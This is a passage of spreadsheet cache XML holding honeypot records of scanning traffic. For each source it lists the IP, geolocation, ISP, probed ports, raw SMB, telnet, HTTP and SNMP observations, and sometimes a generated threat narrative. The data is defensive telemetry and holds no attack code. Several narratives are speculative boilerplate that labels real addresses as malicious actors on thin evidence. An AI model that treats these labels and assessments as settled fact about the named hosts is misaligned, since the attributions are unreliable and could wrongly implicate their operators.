    <s v="{Data_HTTPS:{'Accept': '*/*', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0', 'method': 'GET', 'uri': '/cgi-bin/luci'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d5f:93a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: An unknown client is attempting to access a secure web server on a specific port, likely trying to exploit a vulnerability in the system's web interface. The user-agent is legitimate but the host and method suggest a potential attack attempt. &amp;&amp; Malicious entity attempting to access a potentially vulnerable web interface on an unknown server, possibly trying to gain unauthorized control or exploit existing vulnerabilities. They are using a generic user agent and accept all types of content, indicating a lack of specificity in their request. This could be a reconnaissance phase for further attacks."/>
    <m/>
  </r>
  <r>
    <x v="785"/>
    <x v="785"/>
    <s v="mail.ocleimali.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-26T07:29:55"/>
    <d v="2024-07-18T17:59:36"/>
    <d v="2025-04-26T07:29:55"/>
    <n v="91"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;49676&amp;&amp;445&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ML"/>
    <s v="Mali"/>
    <s v="BKO"/>
    <s v="Bamako"/>
    <s v="Bamako"/>
    <s v="Bamako"/>
    <s v="2460596"/>
    <s v="NA"/>
    <s v="12.6392"/>
    <s v="-8.00289"/>
    <s v="30985"/>
    <s v="IKATEL SA"/>
    <s v="IKATEL SA"/>
    <s v="business"/>
    <s v="Assigner services"/>
    <s v="2015-02-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57960)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,58033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50727)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50817)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,51587)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,51714)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,58513)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,59055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50616)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57265)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50392)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9a76:b33c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An incoming SMB connection from an unfamiliar IP address suggests potential unauthorized access or scanning activity, possibly related to file sharing or data theft attempts._x000a_The source IP may be a malicious actor probing for vulnerabilities or attempting to exploit the system for illicit purposes._x000a_This could also indicate a reconnaissance phase by an attacker. &amp;&amp; Possible malicious activity is an incoming SMB connection from an unknown IP address, which could be a sign of unauthorized access attempt to the system's shared resources. This may indicate a potential attack or exploitation of vulnerabilities on the targeted system. The source IP address seems suspicious and requires further investigation."/>
    <m/>
  </r>
  <r>
    <x v="786"/>
    <x v="786"/>
    <s v="NA&amp;&amp;59-126-30-216.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-26T07:11:23"/>
    <d v="2025-01-16T17:08:38"/>
    <d v="2025-04-26T07:11:23"/>
    <n v="362"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;NA&amp;&amp;55012&amp;&amp;9100&amp;&amp;80&amp;&amp;49058&amp;&amp;34411&amp;&amp;34422"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:1ed8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="787"/>
    <x v="787"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T07:10:29"/>
    <d v="2023-12-01T01:13:00"/>
    <d v="2025-04-26T07:10:29"/>
    <n v="310"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SMTP_H30&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_HTTPS_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;18726&amp;&amp;39629&amp;&amp;25&amp;&amp;8443&amp;&amp;3306&amp;&amp;6379&amp;&amp;1433&amp;&amp;1521&amp;&amp;110&amp;&amp;5432&amp;&amp;445&amp;&amp;37686&amp;&amp;44704&amp;&amp;161&amp;&amp;NA&amp;&amp;5900&amp;&amp;6667&amp;&amp;34407"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643743"/>
    <s v="W1B"/>
    <s v="51.5072"/>
    <s v="-0.127586"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,48378)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,60848)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,37094)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36776)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36784)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36796)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36802)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36810)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36826)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36844)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36850)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:8182"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="788"/>
    <x v="788"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T07:01:18"/>
    <d v="2025-04-26T07:01:18"/>
    <d v="2025-04-26T07:01:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:c3b4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data indicates no malicious TELNET activity was detected, but it's worth noting that the absence of data doesn't necessarily mean no connection occurred._x000a_TELNET is a protocol typically used for remote access, so its absence may not be significant on its own._x000a_However, in combination with other data, it could indicate the attacker chose not to use this service."/>
    <s v="Port Scanning"/>
  </r>
  <r>
    <x v="789"/>
    <x v="789"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T06:34:51"/>
    <d v="2024-12-24T01:47:02"/>
    <d v="2025-04-26T06:34:51"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:ac88"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="790"/>
    <x v="790"/>
    <s v="NA&amp;&amp;e2e-68-127.ssdcloudindia.net"/>
    <x v="0"/>
    <d v="2025-04-26T06:29:17"/>
    <d v="2025-04-26T02:33:00"/>
    <d v="2025-04-26T06:29:17"/>
    <n v="161"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Bakhtāwarpur)"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.5341"/>
    <s v="77.3538"/>
    <s v="132420"/>
    <s v="E2E Networks Limited"/>
    <s v="E2E Networks Limited"/>
    <s v="hosting"/>
    <s v="E2E Networks Limited"/>
    <s v="1992-11-24"/>
    <s v="E2E-NETWORKS-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a434:c87f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="791"/>
    <x v="791"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T06:26:32"/>
    <d v="2025-04-26T06:26:32"/>
    <d v="2025-04-26T06:26:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:bcd8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="792"/>
    <x v="792"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T06:12:39"/>
    <d v="2025-02-22T00:21:37"/>
    <d v="2025-04-26T06:12:39"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Jinju-si"/>
    <s v="Jinju-si (Jinnyangho-ro)"/>
    <s v="1846050"/>
    <s v="52691"/>
    <s v="35.1826"/>
    <s v="128.071"/>
    <s v="9694"/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="residential"/>
    <s v="Seokyung Cable Television Co.. Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b61f:ce93"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="793"/>
    <x v="793"/>
    <s v="187-85-151-52.gegnet.com.br&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-26T06:12:16"/>
    <d v="2023-09-03T23:55:00"/>
    <d v="2025-04-26T06:12:16"/>
    <n v="930"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;80&amp;&amp;123&amp;&amp;389&amp;&amp;9100&amp;&amp;7747&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SC"/>
    <s v="Santa Catarina"/>
    <s v="Capinzal"/>
    <s v="Capinzal"/>
    <s v="3467261"/>
    <s v="89665-000"/>
    <s v="-27.3436"/>
    <s v="-51.6126"/>
    <s v="53062"/>
    <s v="GGNET TELECOM BACKBONE"/>
    <s v="ALT|GGNET TELECOM BACKBONE"/>
    <s v="business"/>
    <s v="Inforline Ltda Me"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb55:9734"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="794"/>
    <x v="794"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T06:10:55"/>
    <d v="2023-08-11T04:48:00"/>
    <d v="2025-04-26T06:10:55"/>
    <n v="578"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5491"/>
    <s v="77.2687"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="Abts Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa0:a467"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="795"/>
    <x v="795"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T05:47:04"/>
    <d v="2025-04-26T05:47:04"/>
    <d v="2025-04-26T05:47:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:a53b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="796"/>
    <x v="796"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T05:27:20"/>
    <d v="2024-09-08T10:50:00"/>
    <d v="2025-04-26T05:27:20"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_VNC_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="Ishan Netsol Pvt Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2014-07-01"/>
    <s v="ISHAN-NETSOL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
